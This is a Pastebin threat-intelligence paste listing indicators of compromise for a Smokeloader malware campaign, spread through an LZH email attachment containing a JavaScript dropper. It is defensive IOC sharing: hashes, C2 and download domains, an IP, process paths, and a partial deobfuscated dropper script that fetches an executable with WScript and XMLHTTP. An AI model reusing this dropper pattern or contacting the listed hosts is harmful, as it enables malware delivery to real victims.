API tools faq
paste
Advertisement
VRad

#smokeloader_081118

VRad
Nov 9th, 2018
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #smokeloader #WSH #LZH
  2.  
  3. https://pastebin.com/JmthzrL4
  4. previous contact:
  5. https://pastebin.com/1scwT0f8
  6. https://pastebin.com/MP3kCSSh
  7. FAQ:
  8. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  9.  
  10. attack_vector
  11. --------------
  12. email attach (lzh) > js > WSH > GET > %AppData%\MS\Windows\Templates\*.exe
  13.  
  14. email_headers
  15. --------------
  16. n/a
  17.  
  18. files
  19. --------------
  20. SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
  21. File name Рахунки ТОВ Техник.lzh
  22. File size 26.37 KB
  23.  
  24. SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
  25. File name 11_2018p.xlsx
  26. File size 12.28 KB
  27.  
  28. SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
  29. File name pax. 00-128 corp. TEXHIK.xls.js
  30. File size 13.99 KB
  31.  
  32. SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
  33. File name sysm.exe !This program cannot be run in DOS mode.
  34. File size 518.5 KB
  35.  
  36. activity
  37. **************
  38.  
  39. deobfuscated_script
  40. dropper_script:
  41. var wsh = new ActiveXObject("wscript.shell");
  42. var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
  43. try { var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
  44. var sh = new ActiveXObject("shell.application");
  45. HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false)
  46. else
  47. HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false)
  48.  
  49. netwrk
  50. --------------
  51. wscript.exe 2872 79.133.98.58 80 ESTABLISHED
  52.  
  53. comp
  54. --------------
  55. 79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0
  56.  
  57. C2 h11p:\ aviatorssm{.} bit/
  58.  
  59. proc
  60. --------------
  61. "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
  62. "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"
  63.  
  64. persist
  65. --------------
  66. n/a (detects vm, sleeps)
  67.  
  68. drop
  69. --------------
  70. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe
  71.  
  72. # # #
  73. lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
  74. xlsx https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
  75. js https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
  76. url1 https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
  77. url2 https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
  78. exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
  79. https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!